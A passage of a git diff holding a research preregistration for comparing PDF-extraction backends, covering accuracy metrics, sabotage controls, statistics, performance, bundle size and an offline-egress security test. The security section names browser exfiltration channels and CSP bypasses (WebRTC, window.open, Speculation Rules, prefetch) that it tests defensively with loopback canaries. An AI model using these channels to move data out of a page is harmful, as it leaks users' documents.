extraction from bad cannot rank anything, and an -all-green sweep looks identical either way. - -**One uniform sabotage is not enough.** A 5 % random glyph dropout garbles text but barely -touches heading attachment, so a metric that survives it may be blind rather than robust — -and declaring it void on that evidence is itself a false negative. **Each metric therefore -gets its own sabotage, injecting the specific fault that metric claims to catch**, applied -to `pdfium-wasm` glyph output with seed 20260805. Glyph field indices are -`contract.GLYPH_FIELDS`. - -| ID | Targets | Injected fault | Must happen | -|---|---|---|---| -| **S1** | B1 | delete 5 % of glyphs, uniformly at random | B1 falls | -| **S2** | B2 | on every line whose max `font_size` exceeds the page's dominant body size, set all its glyphs to the line median — collapsing the small-caps size band | B2 falls | -| **S3** | B3a | delete the leading margin-number glyph run on 5 % of numbered lines | B3a falls | -| **S4** | B5 | shift heading lines' `baseline`/`y0`/`y1` down one body line-height: headings keep their text, but attach to the wrong block | B5 falls **while B2 moves less than 0.020** | -| **S5** | B6 | delete agency-level heading lines only, keeping accounts, so their children reparent | B6 falls **by more than B2 does** | -| **S6** | B7 | relabel a sampled amount's side (old ↔ new) | the corroboration check flags it | -| **S7** | B8 | the ten corrupted gold items (wrong amount, wrong heading, wrong line number) | the scorer flags all ten | -| **SA1** | A1 | perturb one digit of one amount | A1 **fails** | -| **SA2** | A2 | delete one change block's glyphs | A2 **fails** | -| **SA3** | A4 | delete a single glyph | A4 **fails** | - -**The discriminating requirements on S4 and S5 are the point, not decoration.** S4 leaves -every heading label intact and only moves where it sits; if B2 falls as far as B5 does, then -B2 and B5 are measuring the same thing and the association metric adds nothing. Same for S5 -against B6. - -Pre-committed verdicts: - -- **B1, B2, B3a, B5, B6** — a metric whose own sabotage does not move it **beyond that - metric's practical threshold** is **void for this run**, reported as void, and its Δ is - not published as evidence. -- **B7 and B8** have no Δ and no threshold; their controls (S6, S7) are pass/fail. A missed - flag voids that metric outright. -- **A1, A2, A4** — a gate its own sabotage does not fail is void, and a candidate's pass on - a void gate is not evidence of parity. -- Where a discriminating requirement fails, the two metrics involved are reported as - **not separable** — a different finding from either being blind, and it must not be - written as one. - -**Sabotage variants are scored as their own pseudo-backends. They are never pooled with the -candidates, never enter Δ, and never appear in a ranking table.** - -### Statistics: paired cluster bootstrap by bill - -Documents from one bill are correlated and some bills contribute far more documents than -others, so documents are not independent draws. - -| Element | Frozen choice | -|---|---| -| Resampling unit | **the bill**, sampled with replacement; all of a sampled bill's documents travel together | -| Statistic | **Δ = score(pdfminer) − score(pdfium-wasm)**, paired per document, defined once and never inverted | -| Aggregation | per-bill mean of the paired per-document Δ, then the **unweighted mean over sampled bills** | -| Secondary | document-weighted aggregation, reported as a sensitivity check only | -| Resamples | 10,000 | -| Seed | 20260805 | -| Interval | percentile 95 % CI on Δ | - -**Overlapping independent CIs are not evidence of anything and are not reported as such.** -That comparison is removed from the protocol. - -### Practical-effect thresholds, chosen before seeing any confirmatory result - -A backend **leads** on a metric only if **both** hold: the paired cluster-bootstrap 95 % CI -for Δ excludes zero, **and** |Δ̂| ≥ the threshold below. Statistical significance alone -never moves an architecture decision. - -| Metric | Threshold | Why this number | -|---|---|---| -| B1 text F1 | **0.010** | Residual headroom to the XML is ~0.087 (the settled format gap), so 0.010 is ~11 % of everything achievable — and ~1,800 tokens on a 180k-token enrolled bill | -| B2 heading F1 | **0.020** | `118-hr-4366/1` carries 48 accounts and 18 agencies; at that scale 0.02 F1 ≈ 1.3 headings, i.e. one account's worth of the financial data contract | -| B3a self-consistency | **0.005** | Line numbers are the staffer's citation handle; 0.005 on a 1,000-numbered-line document is 5 unciteable lines | -| B5 amount→heading | **0.010** | One amount in 100 filed under the wrong account is a wrong number in a staffer's table | -| B6 parent/child | **0.020** | Same unit as B2 | - -**If neither statistical nor practical superiority is established, the pre-committed -sentence is: "the backends are accuracy-indistinguishable on the available evidence."** -The exploratory 0.9131-vs-0.9126 ordering is below every threshold here and would be -reported as indistinguishable. - -### Repair mode for Concern B - -**Primary: `strict`. Secondary: `repaired`. The per-backend repair delta is reported for -both candidates on every metric.** A repair that lifts one backend by +0.0345 and every -other by 0.0000 is a fact about the metric, and burying it in a default is how the -exploratory ranking went wrong. - -### The soft-hyphen repair must be tested for false repairs - -Testing only whether a repair *helps* is testing one direction of a two-directional rule. - -**False-repair probe.** For every line-final unnamed glyph PDFium reports, join positionally -(page, baseline ±0.6 pt, x0 ±0.5 pt) to the other backends' glyph streams and read what they -resolve it to. **A repair is false when ≥ 2 other backends agree the glyph is not -hyphen-like** (`-`, U+2010, U+2011, U+00AD). - -- **Reported: false-repair count, rate, and the per-document distribution.** -- Run on P1 **and** P2 separately, because a positional rule that holds on one typesetting - class need not hold on another. **Gate B-R: the false-repair rate on the holdout may not - exceed the replication rate by more than 2×**; exceeding it means the rule is - corpus-shaped and must be reported as such. - -### Mandatory parameter-sensitivity tests - -| Parameter | Settings | Default | Rule for claiming a lead | -|---|---|---|---| -| `_SPACE_FACTOR` | 0.15, 0.20, **0.25**, 0.30, 0.40 | 0.25 | lead at **≥ 4 / 5** | -| `_BASELINE_TOL` | 0.1, 0.3, **0.6**, 1.2, 2.0 | 0.6 | lead at **≥ 4 / 5** | -| `_CHROME_SIZE_RATIO` | 0.0 (off), 0.45, **0.55**, 0.65 | 0.55 | lead at **≥ 3 / 4** | -| `upright` filter | on / off | on | **ranking must not reverse** | -| repair mode | strict / repaired | strict (Concern B) | **ranking must not reverse** | - -**Raw sensitivity magnitude is reported for every cell.** A backend whose metric moves by -**> 0.05** across a parameter's sweep is labelled **parameter-fragile on that metric**, next -to its score. - -**Sensitivity at an arbitrary alternate setting is not itself evidence of inaccuracy.** The -question the sweep answers is narrower: *does a claimed lead depend on a PDFium-tuned -default?* A lead that exists only at the default is reported as -*"leads at the default parameterization only"*. - -### Default-value audit — done before freezing, and it found two mismatches - -§7 of the review asked that every bold default be verified against the implementation. - -| Constant | Probe (`reconstruct.py`) | Production (`parsers/pdf_text.py`) | Verdict | -|---|---|---|---| -| `_SPACE_FACTOR` | 0.25 | **0.25** | **matches** — genuinely inherited from PDFium-tuned production | -| `_BASELINE_TOL` | 0.6 **points, absolute** | `_BASELINE_TOL_FACTOR = 0.5 × median glyph size`, **a fraction** | **different parameterization**, not a different value of the same knob | -| `_CHROME_SIZE_RATIO` | 0.55 | **no counterpart** — production strips chrome by regex on text | **spike-invented** | - -Consequence, pre-committed so it cannot be reinterpreted later: only `_SPACE_FACTOR` -supports the audit's "a PDFium-tuned constant inside the neutral layer" framing. Sensitivity -in the other two is a property of **this harness**, and a candidate that looks fragile there -is fragile in a layer production does not have. Both readings are reported; neither is -allowed to borrow the other's interpretation. - ---- - -# The gold sample - -PyMuPDF is a second implementation, not an oracle. This is the only reference in the -protocol that depends on neither a PDF library's text layer nor the XML. - -### Honest naming - -The review asked for a **human-adjudicated** gold sample. **No human is at the keyboard for -this run.** What is built is an **image-adjudicated gold sample**: the execution agent reads -page images and records the fields. Rendering uses **macOS CoreGraphics** (`sips` / -`qlmanage`), an implementation independent of PDFium, pdfminer, PyMuPDF and PDF.js. - -**This is weaker than human adjudication and is labelled that way in every table.** A -20-item seeded subsample is written to `results/gold_human_check.md` for Will to verify by -hand; **until he signs it off, every gold-derived number is published as provisional.** - -### Frozen construction - -1. **Frame.** The union of all six backends' outputs **and** the XML, over the - production-accepted P1 documents. Union rather than any one backend, so no candidate's - blind spot silently removes items from the frame — and items only one backend sees are - the most informative ones in it. -2. **Sampling.** Seeded shuffle within each stratum, seed **20260805**, first N taken. The - frame size and selection index of every item are recorded, so the sample is reproducible - without re-running the shuffle. -3. **Strata.** - - | Financial (50) | N | | Structural (50) | N | - |---|---|---|---|---| - | Backends disagree on the line | 10 | | Backends disagree on presence or level | 10 | - | Inside a long appropriations block (> 40 lines, no heading) | 8 | | Small-caps account headings | 12 | - | Within 3 lines of a heading transition | 8 | | Agency headings | 8 | - | Within 2 printed lines of a page boundary | 8 | | At a page boundary | 8 | - | On a line carrying a soft hyphen | 6 | | On a watermarked page | 6 | - | On a watermarked page | 6 | | Grouping / title headings | 6 | - | Table-like layout (≥ 3 numeric columns) | 4 | | | | - - Additions and deletions are drawn across both halves rather than as a stratum, so a - change item always carries its own before/after context. -4. **Recorded per item**: document; page; printed line number(s) where the page has them; - exact source text of the line; the heading / account / agency context as printed; the - amount as printed; and for change items the expected relationship. -5. **Blinding.** The frame is built from backend output, so the sampler knows every - candidate's answer. **The adjudicator must not.** The sampler writes two files: - - | File | Contents | Read by the adjudicator? | - |---|---|---| - | `gold_key.json` | item id → document, page, **which backends contributed and what each said**, XML value, stratum | **no** — committed, then not opened until scoring | - | `gold_blind.json` | item id → document, page, rendered image path, **a geometric locator (bounding box in PDF points)**, and the question | **yes — this is all it sees** | - - A blind record carries **no backend name, no candidate text, no XML value, and no stratum - label**. Localisation is by bounding box, because a box says *where to look* without - saying *what is there*. Items are presented in a seeded shuffle (20260805) across all - strata, so neighbouring items do not reveal which cell — and therefore which expected - difficulty — an item came from. - -6. **Ordering, enforced by hash rather than by intent.** The adjudicated answers are written - to `gold_adjudicated.json` and **committed, with their SHA-256 recorded, before - `gold_key.json` is joined to them**. The join is a separate committed script. The commit - order is the evidence that adjudication preceded exposure; "I adjudicated first" is not. -7. **Proof the gold set can fire.** Ten deliberately corrupted items (wrong amount, wrong - heading, wrong line number) go into a separate control file. **The scorer must flag all - ten.** A scorer that passes the control silently cannot distinguish a correct backend - from a broken comparison, and the run is void for B8. -8. **Blinding residue that cannot be removed, stated rather than papered over.** The - adjudicator is the same agent that has read `RESULTS.md` and therefore carries the - exploratory prior that pdfminer led the independent metrics. No file-level blinding - removes that. It is a standing limitation on B8, it is one of the reasons the 20-item - human check exists, and **B8 alone may never decide a ranking** — it corroborates or - contradicts B1–B6, which are computed without an adjudicator. - ---- - -# Concern C — security / egress - -### Threat model, stated before any policy is tested - -| | Threat A | Threat B | -|---|---|---| -| **What** | DeltaTrack accidentally or deliberately includes ordinary application networking | Arbitrary or malicious code executing inside the browser tries to exfiltrate document data through any browser capability | -| **What this run can establish** | **Strong controls.** A policy plus network-layer observation genuinely covers this | **Bounds, not impossibility.** The exploratory run already disproved impossibility via WebRTC and `window.open` | - -**Pre-committed: no result in this section may be written as "exfiltration is impossible", -"zero egress", or "permits no subresource or background network egress."** Every claim names -its policy or its environment. - -### Frozen policy under test - -``` -default-src 'none'; script-src 'self'; style-src 'unsafe-inline'; img-src data:; -connect-src 'none'; form-action 'none'; base-uri 'none'; object-src 'none'; -frame-src 'none'; worker-src 'none' -``` - -`script-src 'self'` **without** `'unsafe-inline'`. The exploratory policy included it and was -defeated by Speculation Rules as a direct result. The cost is real and is reported: the -engine must load from external script files, which complicates a single-file artifact. - -### Frozen vector set - -The union of [`vectors.js`](probes/vectors.js) (16) and [`vectors2.js`](probes/vectors2.js) -(19) — **35 mechanisms**, enumerated in those files so the list cannot drift from the code. -Coverage for the exploratory bypasses is retained by name and may not be dropped: -**WebRTC / STUN, `window.open`, top-level navigation, Speculation Rules.** - -**Adding a vector is encouraged and is not a deviation. Removing one is.** - -### Per-vector observability replaces the global control threshold - -The old rule ("control must leak on ≥ 12 of 35") let a vector that never worked in the -control be silently counted as "blocked by policy". In the exploratory round-2 run, five -vectors did exactly that (`link-dns-prefetch`, `link-preconnect`, `track`, `svguse`, -`webtransport`). - -**Every vector receives a control status first:** - -| Control status | Meaning | Eligible for "blocked by policy"? | -|---|---|---| -| **CONTROL TRANSMITTED** | the canary arrived at the server with no policy | **yes** | -| **CONTROL UNSUPPORTED** | the mechanism does not exist or threw in this browser | **no — not scored** | -| **CONTROL FAILED / VOID** | the mechanism ran but nothing arrived, cause unknown | **no — not scored** | - -Then, for each supported mechanism: execute it, transmit a **unique canary derived from a -dummy document**, and observe at the receiving network layer whether that canary arrives. - -**Canary format** (replacing the exploratory constant `secret=BILLTEXT`): -`DELTATRACK_SECRET__`. A per-vector unique value means a -received request proves *which* mechanism carried *document-derived* bytes, not merely that -some request happened. WebRTC is the one exception — a STUN binding request carries no -arbitrary payload — and is reported as **signal-only, not canary-bearing**. - -**Reporting shape**, all four columns always present: - -| vector | control | policy result | notes | -|---|---|---|---| -| … | transmitted marker | **blocked** | | -| … | transmitted marker | **bypasses CSP** | | -| … | transmitted marker | **outside CSP** | no directive governs it | -| … | unsupported | **not scored** | | - -**CDP request events are recorded as diagnostics and never decide**, because a request -object exists before CSP rules on it. The server's received-request log decides. - -### Frozen validity conditions - -A run is **void**, not negative, unless all four hold: - -1. **Per-vector control status assigned** for all 35, with at least one TRANSMITTED. -2. **Known-bad caught** — a build carrying the policy plus one deliberately permitted beacon - is detected. -3. **Vectors ran** — the fixture reports `DONE` and a vector count equal to the frozen set. - *(A `script-src` variant once reported "0 bypasses" with 0 vectors executed: the policy - had blocked the harness's own bootstrap. That is void, not a pass.)* -4. **Observation at the network layer**, over both TCP and UDP. - -### Environment-level isolation, as a separate and stronger claim - -Browser policy and environment isolation support different sentences, and conflating them is -the same error as conflating A with B. - -| Test | Claim it supports | -|---|---| -| Browser policy | "our app does not transmit through these mechanisms" | -| Environment isolation | "the process cannot reach the network at all" | - -**Frozen procedure.** Run a full PDF comparison with outbound networking denied outside the -page, and require it to **succeed**: - -- **Primary (available now): macOS `sandbox-exec` with `(deny network*)`.** Verified during - protocol design: a sandboxed `curl` to a public host fails DNS resolution. -- **Stronger (attempted): a Linux container with `--network none`.** The Docker daemon is - **not running** on this machine at freeze time; if it is unavailable at execution time this - is recorded as **NOT RUN**, never inferred from the macOS result. -**Proof the isolation check can fire.** An unsandboxed run reaching the observation server -proves only that the *server* works; it says nothing about whether the sandboxed run's -silence came from the sandbox or from a dead listener, and it is evidence gathered in a -different environment from the one under test. **Both halves must run, and both inside the -same invocation window:** - -| Control | Where it runs | Required outcome | What it establishes | -|---|---|---|---| -| **known-bad, inside the sandbox** | in the sandboxed process, alongside the comparison | **no request received** | the silence is attributable to the sandbox, not to the app happening not to call out | -| **observer liveness, outside the sandbox** | the harness process, same run, same listener, overlapping window | **request received** | the listener was alive and observing throughout — so "nothing received" means blocked, not unwatched | - -Neither alone is sufficient: the first cannot distinguish a working sandbox from a dead -listener, and the second cannot attribute anything to the sandbox. **A run missing either -control is void, not a pass.** - -Per the rule that a guard's probe must be inert if the guard fails open, both beacons target -`127.0.0.1:8973` — our own listener — carrying a canary. If isolation fails open, the worst -outcome is a loopback request we wanted to see anyway. - -A third check separates loopback from the network generally: **a sandboxed request to an -external host must fail to resolve**, so a pass cannot come from loopback being blocked by -something other than the policy. Verified during protocol design; re-run and recorded each -time. - ---- - -# Concern D — performance - -The exploratory gate-9 verdict for pdfminer **did not reproduce** (37.9 s, then 69.2 s, -against a 60 s ceiling). Absolute timings in this spike are not reproducible to better than -~1.5×. - -| Element | Frozen choice | -|---|---| -| Machine state | Load average **< 1.0** at start, verified and recorded. Above that, the run is **void** | -| Trials | **minimum of 5**, reported as min / median / spread. The **minimum** is the estimator | -| CPU time | recorded alongside wall time; material divergence means contention, and the run is void | -| Concurrency | one backend at a time, never alongside another probe | - -| Gate | Threshold | -|---|---| -| D-1 | Largest corpus document (`119-hr-1/1`, 1118 pp) extracts in **< 60 s**, min-of-5, in-browser | -| D-2 | Within **3×** the incumbent's native full-document time, min-of-5 | - -**A candidate whose min-of-5 straddles the ceiling is `UNRESOLVED`, never rounded.** That is -pdfminer's current state. Relative claims survive contention and may still be made; absolute -threshold claims may not. - ---- - -# Concern E — bundle size and architecture - -The axis the PDFium-WASM-vs-pdfminer decision most likely turns on, and the exploratory run -did not measure it. Build **real browser artifacts** for both finalists (plus PDF.js, whose -artifact is nearly free), then measure: - -| Measurement | Unit | -|---|---| -| Total artifact size | uncompressed / gzip / brotli bytes | -| Incremental backend size | bytes over a common Pyodide + DeltaTrack baseline | -| First load (cold cache) | ms to interactive | -| Repeat load (warm cache) | ms to interactive | -| Pyodide + package initialization | ms | -| Full comparison latency | ms, min-of-5, under the Concern-D idle rules | -| Peak memory | MB | -| JS↔Python transfer | bytes and copy count per document | -| `file://` behavior | works / degraded / fails, per artifact | - -**Pre-committed: do not optimize the 132 MB JS→Python glyph transfer in this run.** Measure -it first; optimize only if the measurement shows a real memory or latency problem. An -unmeasured optimization is how a spike acquires work nobody asked for. - ---- - -# Concern F — `@embedpdf/pdfium` release readiness - -Kept entirely separate from backend accuracy. Nothing here can rank a backend; it can only -gate adoption. - -| Item | What must be established | -|---|---| -| Source revision | the exact upstream revision corresponding to the shipped WASM | -| Fork provenance | what `embedpdf/runtime` is, and how it relates to upstream PDFium | -| Fork patches | the diff against upstream, reviewed | -| Licence obligations | full licence + NOTICE set for everything bundled | -| Vendored third-party | enumerated (`zlib` is confirmed present by string inspection; the rest is open) | -| Reproducibility | whether the shipped artifact can be rebuilt from source independently | -| Vendoring | whether DeltaTrack can vendor a reviewed, checksummed WASM | -| Disappearance | the recovery path if the package or fork goes away | - -**npm package metadata is a lead, not evidence.** The declared `repository.directory` -(`packages/pdfium`) does not exist in that repo's current `main`, and the npm licence (MIT) -disagrees with the upstream repo's own `LICENSING.md` (Apache-2.0 for `packages/`) — so the -metadata is already known to be unreliable here. - -**Pre-committed release-readiness requirement:** DeltaTrack must **either** independently -reproduce the WASM build **or** vendor a reviewed, version-pinned, checksummed artifact tied -to documented source and third-party notices. Failing both is a **blocker for shipping**, -never a mark against measured accuracy. - ---- - -# Cross-cutting rules - -1. **No composite score.** Not across concerns, not within one. -2. **Seeds fixed at 20260805** for every sample, shuffle and bootstrap. -3. **Environment recorded with the results**, and re-stated next to any number quoted - elsewhere. Still macOS 15 / arm64 until someone runs it on Windows. -4. **Raw outputs are immutable.** Every published table is generated from them by a - committed script, never transcribed. -5. **The exploratory record is not edited.** Corrections to it go in this run's results, - pointing at it. - -## Deviations - -Once execution starts, these may not change silently: populations; metrics; normalizations; -thresholds; default parameters; repair rules; sampling rules; holdout membership. - -Any change gets a row in `results/DEVIATIONS.md`, appended **when it happens**, not -reconstructed afterwards: - -| Column | Content | -|---|---| -| Change | exactly what changed, old → new | -| When | timestamp and stage | -| Results already visible? | **yes / no** — and which | -| Reason | why | -| Could move | which scores, rankings or gates | - -Then continue only if the result is still interpretable. If it is not, the affected numbers -are published as exploratory, not confirmatory. - ---- - -# Decision rules - -Applied in order. **"Best backend" is not an available output unless rule 1 fires.** - -1. If one candidate has a **clear, practically meaningful, independently validated** accuracy - advantage on **both** replication and holdout data, surface that tradeoff explicitly. -2. If independent accuracy is indistinguishable, then **migration risk, performance, bundle - size, maintainability and supply-chain risk become legitimate tie-breakers** — and the - decision is written as a tie-break, not as an accuracy finding. -3. **PDFium-WASM's exact production parity is evidence for migration safety, not for - independent correctness.** -4. **pdfminer's stronger exploratory independent metrics are evidence worth testing, not - proof that it is more accurate.** -5. **Every security conclusion names the exact policy or environment under which it holds.** - ---- - -# What this run cannot settle, by construction - -- **Genuine pre-publication material.** Chair's marks, discussion drafts and real committee - drafts do not exist in the repository and cannot be fetched; they need a congressional - contact. This is the material ADR 0010 says the PDF pipeline exists for. -- **Windows.** Everything is macOS 15 / arm64. -- **PDF.js's true capability**, since the operator-list adapter is not being built. -- **Real scanned/image-only PDFs.** The synthetic rasterized proxy can test safe failure and - nothing else. -- **Human-grade adjudication**, until Will signs off the 20-item check. - ---- - -# Reviewer reproduction kit - -The minimum another reviewer needs. Every command runs from the repo root with -`.venv/bin/python`; setup is in [`probes/README.md`](probes/README.md). - -| Goal | Artifact / command | -|---|---| -| **1. Verify protocol compliance** | This file at its freeze commit; `results/DEVIATIONS.md`; `results/holdout_membership.json`, committed before any score file. **Check `git log` order, not file timestamps**: `gold_adjudicated.json` must be committed before `gold_key.json` is joined to it, and that ordering is the only evidence the adjudication was blind | -| **2. Regenerate tables from raw output** | `probes/fill_results.py` — every table in the results document is generated, none transcribed | -| **3. Reproduce migration parity** | `probes/score_phase2.py` (13 accepted) and `probes/redteam_unguarded.py` (the 2 declined, guard bypassed). **SA1 / SA2 / SA3 must fail A1 / A2 / A4 respectively**; a gate its own sabotage does not fail is void | -| **4. Reproduce independent-accuracy statistics** | `probes/score_phase1.py` → `probes/report_confirmatory.py`, which emits Δ, the paired cluster-bootstrap CI, the practical-threshold verdict and **every B0 row (S1–S5, with the S4/S5 separability checks)** together. **A Δ table without its own metric's B0 row is not reviewable** | -| **5. Reproduce the security table** | `probes/redteam_egress2.py` and `probes/redteam_csp_mitigation.py` for the per-vector control/policy matrix; `probes/phase4_egress.py` for the environment-isolation run, which must carry **both** the inside-sandbox known-bad and the same-run observer-liveness control | - -**Independence.** The execution agent does not self-certify these conclusions. The -deliverables are: this frozen preregistration, immutable raw outputs, scripts that regenerate -every table, and a results document that keeps A / B / C / D / E / F apart — for review by a -separate model against the raw output, not against the summary. - ---- - -# Unresolved design choices - -Decisions the protocol had to make that a reviewer could reasonably make differently. Each is -frozen above; each is listed here so it is challenged rather than discovered. - -| # | Choice | Made | Alternative, and why it was not taken | -|---|---|---|---| -| 1 | Gold-sample adjudicator | **Agent reading CoreGraphics-rendered page images**, blinded to backend output by a two-file split and a commit-order proof, with a 20-item human check pending | True human adjudication of 100 items. Nobody is at the keyboard; blocking the run on it delivers nothing. The claim is downgraded and labelled, and B8 may not decide a ranking on its own | -| 2 | B3 line-number oracle | **Split**: B3a self-consistency (no reference) + B3b exactness on gold pages | The old "vs the page's own margin numbers" has no implementation — the exploratory metric scored against the **incumbent**. There is no corpus-scale margin-number oracle that is not a backend | -| 3 | PDF.js in A / B | **Excluded**; measured in E only | Building the operator-list adapter. It is a large piece of work with no concrete trigger, and it would delay every other answer | -| 4 | B metric weighting | **Bill-weighted** (per-bill mean, then mean over bills) | Document-weighted, which lets one 6-document bill dominate. Reported as a secondary sensitivity | -| 5 | Concern A primary mode | **`repaired`** — the mode we would ship | `strict`, which grades a migration against a mode nobody would ship. Strict stays as a diagnostic | -| 6 | B5 restricted to shared amounts | **Yes** | Scoring all amounts, which folds detection failures into an association metric and makes it un-interpretable | -| 7 | Quoted-block documents | **Own stratum**, excluded from primary B2/B5/B6 | Pooling them, which lets a known reference defect (DeltaTrack#11) decide a backend ranking on 30 of 52 documents | -| 8 | Holdout size | **12 bills** | More would be better and slower. The adequacy rule is what protects the claim, not the number | -| 9 | Synthetic P3b fixtures | **Safe-failure only** | Scoring accuracy on them, which would measure the synthesis rather than the backend | -| 10 | Environment isolation | **macOS `sandbox-exec`** primary, Linux container attempted | Requiring Docker, which is not running and would need Will to start it | diff --git a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md b/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md deleted file mode 100644 index b312a951..00000000 --- a/docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md +++ /dev/null @@ -1,161 +0,0 @@ -# Pre-registration: metrics, materiality and pass thresholds - -Written **2026-08-05, before any accuracy result was computed**, as Phase 0 step 5 of -[`README.md`](README.md) requires. A bake-off whose metrics are chosen after the fact is -not a bake-off. - -## What had already been seen when this was written - -Stating this plainly, because "pre-registered" is worth nothing if the boundary is vague. -The spec deliberately orders the cheap kill-gates (Phase 0 steps 1-4) **before** -pre-registration, so the following were known: - -| Known | Value | -|---|---| -| PDFium-WASM FFI availability | All four required entry points exported and working | -| PDF.js whole-document cost | 1536 ms for 94 pages, incl. 408 ms `getOperatorList()` | -| pdfminer.six speed | 1.5x-3.3x the incumbent's native glyph walk | -| Incumbent extraction baseline | 5.8-10.9 s for a 1000+ page bill | -| All six adapters emit the contract | Yes, agreeing on line numbers over 6 pages | - -**No accuracy score, diff-agreement number, or per-document result had been computed.** -Everything below concerns accuracy, and none of it was informed by an accuracy result. - -One threshold, **gate 9 (performance)**, was necessarily set *after* seeing the speed -numbers, because the spec's own ordering puts that gate first. It is written as a -relative threshold for the reason given in its row, and that reasoning is stated so a -reader can judge whether the number was chosen to admit a favoured candidate. - ---- - -## Definitions - -### Material (gates 4 and 5) - -Gates 4 and 5 are unfalsifiable without this. A disagreement between the PDF-derived and -XML-derived diff is **material** if any of: - -- **(a) Money.** It is an `amount_entries` entry whose `old`, `new` or `kind` differs - between the two pipelines, or which is present in one and absent from the other. -- **(b) Provision text.** It is a change whose `text.old` or `text.new` differs between - pipelines by more than *typographic normalization* (see below). -- **(c) Whole change presence.** It is a change present in one pipeline and absent from - the other, **and** its text contains a dollar amount, a section or heading identifier, - or at least 20 non-whitespace characters of provision text. - -**Typographic normalization**, explicitly non-material: runs of whitespace; the glyph -mappings `normalize_glyphs` already performs (em/en dashes, smart quotes, paired -apostrophes); soft-hyphen rejoining; GPO margin line numbers; and letter-spacing inside -small-caps headings. - -Also **non-material by construction**, because the two pipelines are different artifacts -rather than two attempts at one artifact: `location` (the PDF carries page/line -coordinates, the XML carries none), `full_text_span` offsets, `anchor_resolution`, and -the ordering of changes. This follows the settled finding that PDF-vs-XML *output -parity* is impossible by design; the terminal metric is therefore scored on -structure-free content, not on coordinates. - -The 20-character floor in (c) exists to keep a single stray chrome fragment from -counting as a material error. It is the one arbitrary constant here, and every -disagreement it excludes is reported separately so the choice is auditable. - -### Agreement vs accuracy - -Reported separately and never conflated, per Trap 2: - -- **Agreement** = PDF-derived diff vs XML-derived diff. Cheap, computed for all pairs. -- **Accuracy** = adjudication of the *disputed subset* against ADR 0009's independently - authored committee reports. Only this may be called accuracy. - ---- - -## Metrics - -Every metric is computed on output of the **one** neutral reconstruction layer, so it -measures glyph-fact quality rather than a library's own text-assembly. - -### Phase 1, per document (N = 52) - -| # | Metric | Definition | -|---|---|---| -| M1 | Text recovery | Token-level F1 against the XML body text, both sides normalized (case preserved, whitespace collapsed, `normalize_glyphs` applied, margin numbers removed). Tokens, not characters: character similarity is dominated by whitespace and flatters every backend. | -| M2 | Line-number recovery | Recall and spurious rate over the set of `(page, line_number)` pairs, referenced to the incumbent through the same layer. Exact set comparison, not text similarity. | -| M3 | Heading tree | Node count and `level` distribution vs incumbent, plus the ADR 0014 money-conservation invariant on `_pdf_tree_payload` (own_amounts never over-count; drops bounded). | -| M4 | Breadcrumbs | `breadcrumb_for` agreement rate over the anchors the incumbent resolves. | -| M5 | Font-role separation | Share of numbered lines where the margin-number glyph's font differs from the line's body font. Scored as **role separation**, never name-string equality, because bodies are `DeVinne` in bills and `NewCenturySchlbk` in enrolled/committee prints. Empty-font-name rate reported per backend. | - -### Phase 2, terminal metric (N = 15 pairs) - -| # | Metric | Definition | -|---|---|---| -| T1 | Change-set agreement | Precision/recall/F1 of PDF-derived changes against XML-derived changes, matched on normalized `(change_type, text.old, text.new)`. | -| T2 | `amount_entries` agreement | Precision/recall/F1 over `(old, new, kind)` triples, aggregated per pair. Money is scored separately because it is the highest-consequence field. | -| T3 | Material disagreements | Count of disagreements meeting the materiality definition, listed individually for adjudication. | - -Reported **per bill**, never only as an aggregate: 15 pairs concentrate in `118-hr-4366` -(5), `113-hr-3547` (3) and `115-hr-5895` (2), so one bill would otherwise drive the -headline. - -### Strict vs repaired - -Every Phase 1 and Phase 2 number is computed **twice**: once in `strict` mode, where a -glyph the backend could not name stays U+FFFD, and once in `repaired` mode, where a -line-final unnamed glyph is read as a hyphen from position alone. The repair rule is -available to all backends equally and is a no-op for those that name the glyph. The -**gap between the two** is the measurement of a backend's glyph-naming deficit, and -collapsing it to one number would hide the single largest difference found so far. - ---- - -## Pass thresholds - -Hard gates. A backend passes or fails; ranking applies only among survivors. No weighted -composite: DeltaTrack is accuracy-sensitive, and a composite lets a missed appropriation -be offset by 200 ms of speed. - -| # | Gate | Threshold | Reference | -|---|---|---|---| -| 1 | Opens the corpus | 52/52 documents, no exception, no zero-glyph page beyond those the incumbent also reports empty | absolute | -| 2 | Line-number integrity | recall >= incumbent - 0.005 **and** spurious <= incumbent + 0.005 | **incumbent** (no-regression) | -| 3 | Structural conservation | ADR 0014 conservation holds on every document where it holds for the incumbent; heading-node count within 2% | **incumbent** (no-regression) | -| 4 | Material diff correctness | **Zero** adjudicated material errors across 15 pairs | **XML + ADR 0009** (correctness) | -| 5 | `amount_entries` | **Zero** adjudicated amount errors across 15 pairs | **XML + ADR 0009** (correctness) | -| 6 | Browser execution | Runs under Pyodide or natively in-browser and matches its own native result | absolute | -| 7 | Fully offline | Zero network requests, proven by a harness with a known-bad control | absolute | -| 8 | Licensing | Satisfies the project distribution policy | absolute | -| 9 | Performance | Largest corpus document within **3x** the incumbent's native extraction time, **and** projected Pyodide time <= 60 s | **incumbent**, relative | - -Gates 2 and 3 are **no-regression** gates measured against PDFium; gates 4 and 5 are -**correctness** gates measured against XML. They are different questions and are kept -labelled distinctly in the results. - -**Gate 9's threshold, and why it is relative.** The incumbent itself takes 5.8-10.9 s -natively on a 1000+ page bill, which is 9-21 s under the delivery spike's measured -1.6x-1.9x Pyodide penalty. An absolute "tens of seconds" rule would therefore disqualify -PDFium, which is not a coherent outcome for a no-regression exercise. 3x keeps a backend -in contention if it is the same order of magnitude as what ships today, and the 60 s -projected ceiling is the point past which a staffer would reasonably abandon a -comparison. Both numbers are stated so a reader can disagree with them explicitly. - ---- - -## Statistical power, stated up front - -Zero material failures across **15 pairs** is consistent, by the rule of three, with a -true material-failure rate as high as **~20% at 95% confidence**. This is reported -alongside any zero result. It is not an argument against the gate; it is the reason -Tier B is necessary rather than optional, and the reason the phrase "PDF is solved" -may not appear in the results regardless of how Tier A scores. - -## What would falsify the whole exercise - -The calibration gate. If the incumbent does not score near ceiling **through the neutral -layer**, the layer is wrong and no other number in this document means anything. That -check runs before any challenger is scored, and its result is reported first. - -One caveat the spec did not anticipate, recorded here before the gate runs: the premise -"PDFium is known-good" is true of PDFium *through its text API plus `normalize_raw`*, not -necessarily of its **glyph API**, which is what this bake-off actually measures. A -measured shortfall in PDFium's glyph facts is therefore a real finding rather than -automatic proof that the layer is broken, and the two are distinguished 